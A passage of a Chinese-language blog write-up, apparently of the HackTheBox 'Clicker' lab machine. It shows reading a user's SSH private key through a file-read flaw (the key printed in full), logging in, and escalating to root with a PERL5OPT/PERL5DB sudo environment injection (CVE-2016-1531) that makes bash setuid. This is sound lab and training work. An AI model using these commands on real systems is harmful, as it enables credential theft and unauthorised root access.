<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs plain">./execute_query 5 ../.ssh/id_rsa<br><br><br>mysql: [Warning] Using a password on the command line interface can be insecure.<br>--------------<br>-----BEGIN OPENSSH PRIVATE KEY----<br>b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br>NhAAAAAwEAAQAAAYEAs4eQaWHe45iGSieDHbraAYgQdMwlMGPt50KmMUAvWgAV2zlP8/1Y<br>J/tSzgoR9Fko8I1UpLnHCLz2Ezsb/MrLCe8nG5TlbJrrQ4HcqnS4TKN7DZ7XW0bup3ayy1<br>kAAZ9Uot6ep/ekM8E+7/39VZ5fe1FwZj4iRKI+g/BVQFclsgK02B594GkOz33P/Zzte2jV<br>Tgmy3+htPE5My31i2lXh6XWfepiBOjG+mQDg2OySAphbO1SbMisowP1aSexKMh7Ir6IlPu<br>nuw3l/luyvRGDN8fyumTeIXVAdPfOqMqTOVECo7hAoY+uYWKfiHxOX4fo+/fNwdcfctBUm<br>pr5Nxx0GCH1wLnHsbx+/oBkPzxuzd+BcGNZp7FP8cn+dEFz2ty8Ls0Mr+XW5ofivEwr3+e<br>30OgtpL6QhO2eLiZVrIXOHiPzW49emv4xhuoPF3E/5CA6akeQbbGAppTi+EBG9Lhr04c9E<br>2uCSLPiZqHiViArcUbbXxWMX2NPSJzDsQ4xeYqFtAAAFiO2Fee3thXntAAAAB3NzaC1yc2<br>EAAAGBALOHkGlh3uOYhkongx262gGIEHTMJTBj7edCpjFAL1oAFds5T/P9WCf7Us4KEfRZ<br>KPCNVKS5xwi89hM7G/zKywnvJxuU5Wya60OB3Kp0uEyjew2e11tG7qd2sstZAAGfVKLenq<br>f3pDPBPu/9/VWeX3tRcGY+IkSiPoPwVUBXJbICtNgefeBpDs99z/2c7Xto1U4Jst/obTxO<br>TMt9YtpV4el1n3qYgToxvpkA4NjskgKYWztUmzIrKMD9WknsSjIeyK+iJT7p7sN5f5bsr0<br>RgzfH8rpk3iF1QHT3zqjKkzlRAqO4QKGPrmFin4h8Tl+H6Pv3zcHXH3LQVJqa+TccdBgh9<br>cC5x7G8fv6AZD88bs3fgXBjWaexT/HJ/nRBc9rcvC7NDK/l1uaH4rxMK9/nt9DoLaS+kIT<br>tni4mVayFzh4j81uPXpr+MYbqDxdxP+QgOmpHkG2xgKaU4vhARvS4a9OHPRNrgkiz4mah4<br>lYgK3FG218VjF9jT0icw7EOMXmKhbQAAAAMBAAEAAAGACLYPP83L7uc7vOVl609hvKlJgy<br>FUvKBcrtgBEGq44XkXlmeVhZVJbcc4IV9Dt8OLxQBWlxecnMPufMhld0Kvz2+XSjNTXo21<br>1LS8bFj1iGJ2WhbXBErQ0bdkvZE3+twsUyrSL/xIL2q1DxgX7sucfnNZLNze9M2akvRabq<br>DL53NSKxpvqS/v1AmaygePTmmrz/mQgGTayA5Uk5sl7Mo2CAn5Dw3PV2+KfAoa3uu7ufyC<br>kMJuNWT6uUKR2vxoLT5pEZKlg8Qmw2HHZxa6wUlpTSRMgO+R+xEQsemUFy0vCh4TyezD3i<br>SlyE8yMm8gdIgYJB+FP5m4eUyGTjTE4+lhXOKgEGPcw9+MK7Li05Kbgsv/ZwuLiI8UNAhc<br>9vgmEfs/hoiZPX6fpG+u4L82oKJuIbxF/I2Q2YBNIP9O9qVLdxUniEUCNl3BOAk/8H6usN<br>9pLG5kIalMYSl6lMnfethUiUrTZzATPYT1xZzQCdJ+qagLrl7O33aez3B/OAUrYmsBAAAA<br>wQDB7xyKB85+On0U9Qk1jS85dNaEeSBGb7Yp4e/oQGiHquN/xBgaZzYTEO7WQtrfmZMM4s<br>SXT5qO0J8TBwjmkuzit3/BjrdOAs8n2Lq8J0sPcltsMnoJuZ3Svqclqi8WuttSgKPyhC4s<br>FQsp6ggRGCP64C8N854//KuxhTh5UXHmD7+teKGdbi9MjfDygwk+gQ33YIr2KczVgdltwW<br>EhA8zfl5uimjsT31lks3jwk/I8CupZGrVvXmyEzBYZBegl3W4AAADBAO19sPL8ZYYo1n2j<br>rghoSkgwA8kZJRy6BIyRFRUODsYBlK0ItFnriPgWSE2b3iHo7cuujCDju0yIIfF2QG87Hh<br>zXj1wghocEMzZ3ELIlkIDY8BtrewjC3CFyeIY3XKCY5AgzE2ygRGvEL+YFLezLqhJseV8j<br>3kOhQ3D6boridyK3T66YGzJsdpEvWTpbvve3FM5pIWmA5LUXyihP2F7fs2E5aDBUuLJeyi<br>F0YCoftLetCA/kiVtqlT0trgO8Yh+78QAAAMEAwYV0GjQs3AYNLMGccWlVFoLLPKGItynr<br>Xxa/j3qOBZ+HiMsXtZdpdrV26N43CmiHRue4SWG1m/Vh3zezxNymsQrp6sv96vsFjM7gAI<br>JJK+Ds3zu2NNNmQ82gPwc/wNM3TatS/Oe4loqHg3nDn5CEbPtgc8wkxheKARAz0SbztcJC<br>LsOxRu230Ti7tRBOtV153KHlE4Bu7G/d028dbQhtfMXJLu96W1l3Fr98pDxDSFnig2HMIi<br>lL4gSjpD/FjWk9AAAADGphY2tAY2xpY2tlcgECAwQFBg==<br>-----END OPENSSH PRIVATE KEY----<br>--------------<br><br>ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;-----BEGIN OPENSSH PRIVATE KEY---<br>b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA&#x27; at line 1<br></code></pre></td></tr></table></figure>

<p>保存到本地连接 ssh，记得补齐-</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs plain">-----BEGIN OPENSSH PRIVATE KEY-----<br>b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br>NhAAAAAwEAAQAAAYEAs4eQaWHe45iGSieDHbraAYgQdMwlMGPt50KmMUAvWgAV2zlP8/1Y<br>J/tSzgoR9Fko8I1UpLnHCLz2Ezsb/MrLCe8nG5TlbJrrQ4HcqnS4TKN7DZ7XW0bup3ayy1<br>kAAZ9Uot6ep/ekM8E+7/39VZ5fe1FwZj4iRKI+g/BVQFclsgK02B594GkOz33P/Zzte2jV<br>Tgmy3+htPE5My31i2lXh6XWfepiBOjG+mQDg2OySAphbO1SbMisowP1aSexKMh7Ir6IlPu<br>nuw3l/luyvRGDN8fyumTeIXVAdPfOqMqTOVECo7hAoY+uYWKfiHxOX4fo+/fNwdcfctBUm<br>pr5Nxx0GCH1wLnHsbx+/oBkPzxuzd+BcGNZp7FP8cn+dEFz2ty8Ls0Mr+XW5ofivEwr3+e<br>30OgtpL6QhO2eLiZVrIXOHiPzW49emv4xhuoPF3E/5CA6akeQbbGAppTi+EBG9Lhr04c9E<br>2uCSLPiZqHiViArcUbbXxWMX2NPSJzDsQ4xeYqFtAAAFiO2Fee3thXntAAAAB3NzaC1yc2<br>EAAAGBALOHkGlh3uOYhkongx262gGIEHTMJTBj7edCpjFAL1oAFds5T/P9WCf7Us4KEfRZ<br>KPCNVKS5xwi89hM7G/zKywnvJxuU5Wya60OB3Kp0uEyjew2e11tG7qd2sstZAAGfVKLenq<br>f3pDPBPu/9/VWeX3tRcGY+IkSiPoPwVUBXJbICtNgefeBpDs99z/2c7Xto1U4Jst/obTxO<br>TMt9YtpV4el1n3qYgToxvpkA4NjskgKYWztUmzIrKMD9WknsSjIeyK+iJT7p7sN5f5bsr0<br>RgzfH8rpk3iF1QHT3zqjKkzlRAqO4QKGPrmFin4h8Tl+H6Pv3zcHXH3LQVJqa+TccdBgh9<br>cC5x7G8fv6AZD88bs3fgXBjWaexT/HJ/nRBc9rcvC7NDK/l1uaH4rxMK9/nt9DoLaS+kIT<br>tni4mVayFzh4j81uPXpr+MYbqDxdxP+QgOmpHkG2xgKaU4vhARvS4a9OHPRNrgkiz4mah4<br>lYgK3FG218VjF9jT0icw7EOMXmKhbQAAAAMBAAEAAAGACLYPP83L7uc7vOVl609hvKlJgy<br>FUvKBcrtgBEGq44XkXlmeVhZVJbcc4IV9Dt8OLxQBWlxecnMPufMhld0Kvz2+XSjNTXo21<br>1LS8bFj1iGJ2WhbXBErQ0bdkvZE3+twsUyrSL/xIL2q1DxgX7sucfnNZLNze9M2akvRabq<br>DL53NSKxpvqS/v1AmaygePTmmrz/mQgGTayA5Uk5sl7Mo2CAn5Dw3PV2+KfAoa3uu7ufyC<br>kMJuNWT6uUKR2vxoLT5pEZKlg8Qmw2HHZxa6wUlpTSRMgO+R+xEQsemUFy0vCh4TyezD3i<br>SlyE8yMm8gdIgYJB+FP5m4eUyGTjTE4+lhXOKgEGPcw9+MK7Li05Kbgsv/ZwuLiI8UNAhc<br>9vgmEfs/hoiZPX6fpG+u4L82oKJuIbxF/I2Q2YBNIP9O9qVLdxUniEUCNl3BOAk/8H6usN<br>9pLG5kIalMYSl6lMnfethUiUrTZzATPYT1xZzQCdJ+qagLrl7O33aez3B/OAUrYmsBAAAA<br>wQDB7xyKB85+On0U9Qk1jS85dNaEeSBGb7Yp4e/oQGiHquN/xBgaZzYTEO7WQtrfmZMM4s<br>SXT5qO0J8TBwjmkuzit3/BjrdOAs8n2Lq8J0sPcltsMnoJuZ3Svqclqi8WuttSgKPyhC4s<br>FQsp6ggRGCP64C8N854//KuxhTh5UXHmD7+teKGdbi9MjfDygwk+gQ33YIr2KczVgdltwW<br>EhA8zfl5uimjsT31lks3jwk/I8CupZGrVvXmyEzBYZBegl3W4AAADBAO19sPL8ZYYo1n2j<br>rghoSkgwA8kZJRy6BIyRFRUODsYBlK0ItFnriPgWSE2b3iHo7cuujCDju0yIIfF2QG87Hh<br>zXj1wghocEMzZ3ELIlkIDY8BtrewjC3CFyeIY3XKCY5AgzE2ygRGvEL+YFLezLqhJseV8j<br>3kOhQ3D6boridyK3T66YGzJsdpEvWTpbvve3FM5pIWmA5LUXyihP2F7fs2E5aDBUuLJeyi<br>F0YCoftLetCA/kiVtqlT0trgO8Yh+78QAAAMEAwYV0GjQs3AYNLMGccWlVFoLLPKGItynr<br>Xxa/j3qOBZ+HiMsXtZdpdrV26N43CmiHRue4SWG1m/Vh3zezxNymsQrp6sv96vsFjM7gAI<br>JJK+Ds3zu2NNNmQ82gPwc/wNM3TatS/Oe4loqHg3nDn5CEbPtgc8wkxheKARAz0SbztcJC<br>LsOxRu230Ti7tRBOtV153KHlE4Bu7G/d028dbQhtfMXJLu96W1l3Fr98pDxDSFnig2HMIi<br>lL4gSjpD/FjWk9AAAADGphY2tAY2xpY2tlcgECAwQFBg==<br>-----END OPENSSH PRIVATE KEY-----<br></code></pre></td></tr></table></figure>

<p>给文件一个 600 权限，登录 ssh</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">chmod 600 id_rsa<br>ssh -i id_rsa jack@10.10.11.232<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450826.png" alt="img"></p>
<p>找到第一个 flag:5fdd6314e0fb12c8713770039cf6bad7</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450827.png" alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">sudo -l			检查当前用户在sudo配置中被授权执行哪些命令。<br>cd /opt			将当前工作目录更改为/opt。<br>ls -al			列出/opt目录中的所有文件和子目录，并显示它们的详细信息，包括权限、所有者和修改日期等。<br>cat monitor.sh			输出名为monitor.sh的文件的内容<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450828.png" alt="img"></p>
<p>sudo -l 获取到的一些信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plain">任意命令执行：用户&quot;jack&quot;可以以任意身份运行任何命令。<br><br>SETENV特权：用户&quot;jack&quot;可以使用SETENV特权设置环境变量，而无需输入密码。<br><br>NOPASSWD特权：用户&quot;jack&quot;以root用户身份执行&quot;/opt/monitor.sh&quot;脚本时，不需要输入密码。<br></code></pre></td></tr></table></figure>

<p>monitor.sh这段脚本是一个Bash脚本，用于执行一系列操作并保存诊断数据到文件中。</p>
<p>首先，它检查当前用户的EUID（Effective User ID），如果不是0（即不是root用户），则输出错误信息并退出脚本。</p>
<p>接下来，它设置了PATH环境变量，指定了一组路径，以确保可以找到所需的命令和程序。</p>
<p>然后，它使用curl命令获取一个URL（<a target="_blank" rel="noopener" href="http://clicker.htb/diagnostic.php?token=secret_diagnostic_token%EF%BC%89%E8%BF%94%E5%9B%9E%E7%9A%84%E6%95%B0%E6%8D%AE%EF%BC%8C%E5%B9%B6%E5%B0%86%E7%BB%93%E6%9E%9C%E5%AD%98%E5%82%A8%E5%9C%A8%E5%8F%98%E9%87%8F$data%E4%B8%AD%E3%80%82">http://clicker.htb/diagnostic.php?token=secret_diagnostic_token）返回的数据，并将结果存储在变量$data中。</a></p>
<p>接着，它使用xml_pp对$data进行格式化，然后输出到屏幕上。</p>
<p>如果变量$NOSAVE的值为”true”，则脚本直接退出。</p>
<p>否则，它使用date命令获取当前时间戳，并将data的内容保存到&#x2F;root&#x2F;diagnostic_files&#x2F;diagnostic_{timestamp}.xml文件中。</p>
<p>查看 xml_pp</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450829.png" alt="img"></p>
<p><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/39702?source=post_page-----1b15edf443b8--------------------------------">CVE 2016-1531</a>提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">sudo PERL5OPT=-d PERL5DB=&#x27;exec &quot;ls /root&quot;&#x27; /opt/monitor.sh<br>sudo PERL5OPT=-d PERL5DB=&#x27;exec &quot;cat /root/root.txt&quot;&#x27; /opt/monitor.sh<br>sudo PERL5OPT=-d PERL5DB=&#x27;exec &quot;chmod u+s /bin/bash&quot;&#x27; /opt/monitor.sh<br>bash -p<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450830.png" alt="img"></p>
<p>拿到第二个 flag:635e217dd41a18dae7f1843b7d5509c6</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2023/10/24/Giddy_Medium/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2024-02-22 14:51:58
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/HackTheBox/" title="HackTheBox">
                        #HackTheBox
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2024/01/22/U%E9%AA%8C%E8%AF%81%E7%BD%91%E7%BB%9C%E7%94%A8%E6%88%B7%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Clicker-Medium"><span class="toc-text">Clicker_Medium</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B"><span class="toc-text">漏洞探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-text">权限提升</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/076w">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
        <li>
          
            <a title="email" href="mailto:admin@syst1m.cn">
              <i class="iconfont icon-envelope"></i>
            </a>
            
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/076w">Copyright © 2024 076w</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
    <div class="footer-views">
      
          本站总访问量<span id="busuanzi_value_site_pv"></span>次
        
      
          本文总阅读量<span id="busuanzi_value_page_pv"></span>次
        
      
          本站访客数<span id="busuanzi_value_site_uv"></span>人
        
      
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Clicker_Medium + '&url=' + http%3A%2F%2Fsyst1m.cn%2F2023%2F11%2F03%2FClicker_Medium%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://syst1m.cn/2023/11/03/Clicker_Medium/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
